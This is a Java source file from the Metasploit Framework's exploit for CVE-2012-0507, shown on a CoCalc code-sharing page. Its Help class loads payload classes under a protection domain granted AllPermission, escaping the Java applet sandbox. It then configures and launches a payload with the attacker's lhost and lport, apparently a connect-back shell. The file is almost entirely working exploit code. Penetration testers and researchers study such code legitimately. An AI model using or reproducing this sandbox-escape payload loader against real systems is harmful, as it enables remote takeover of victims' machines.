CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2012-0507/msf/x/Help.java
Views: 11788
1
package msf.x;

2


3
import java.io.ByteArrayOutputStream;

4
import java.io.IOException;

5
import java.io.InputStream;

6
import java.io.ObjectInputStream;

7
import java.io.ObjectOutputStream;

8
import java.io.Serializable;

9
import java.net.URL;

10
import java.security.AllPermission;

11
import java.security.CodeSource;

12
import java.security.Permissions;

13
import java.security.ProtectionDomain;

14
import java.security.cert.Certificate;

15
import java.lang.reflect.Field;

16


17
public class Help extends ClassLoader implements Serializable{

18
	public static void doWork(Help h, Exploit expl, String data, String jar, String lhost, int lport) {

19


20
		String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };

21
		String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };

22
		Class cls = null;

23


24
		try

25
		{

26
			for( int index=0 ; index<classNames.length ; index++ )

27
			{

28


29
				ByteArrayOutputStream bos = new ByteArrayOutputStream();

30
				byte[] buffer = new byte[8192];

31
				int length;

32
			

33
				// read in the class file from the jar

34
				InputStream is = expl.getClass().getResourceAsStream( classPaths[index] );

35


36
				// and write it out to the byte array stream

37
				while( ( length = is.read( buffer ) ) > 0 )

38
					bos.write( buffer, 0, length );

39


40
				// convert it to a simple byte array

41
				buffer = bos.toByteArray();

42


43
				URL url = new URL( "file:///" );

44
				Certificate[] certs = new Certificate[0];

45
				Permissions perm = new Permissions();

46
				perm.add( new AllPermission() );

47
				ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );

48
				cls = h.defineClass( classNames[index], buffer, 0, buffer.length, pd );

49
			}

50


51
			// cls will end up being the PayloadX class

52
			if( cls != null )

53
			{

54
				// reflect into the PayloadX class to get these three fields

55
				Field payload_data  = cls.getField( "data" );

56
				Field payload_jar   = cls.getField( "jar" );

57
				Field payload_lhost = cls.getField( "lhost" );

58
				Field payload_lport = cls.getField( "lport" );

59


60
				// instantiate the PayloadX object once so as we can set the native payload data

61
				Object obj = cls.newInstance();

62


63
				// set the native payload data, lhost and lport

64
				payload_data.set( obj, data );

65
				payload_jar.set( obj, jar );

66
				payload_lhost.set( obj, lhost );

67
				payload_lport.setInt( obj, lport );

68


69
				// instantiate a second PayloadX object to perform the actual payload

70
				obj = cls.newInstance();

71
			}

72
		}

73
		catch( Exception e ) {

74
			//System.out.println(e.getMessage());

75
		}

76
	}

77
}

78


79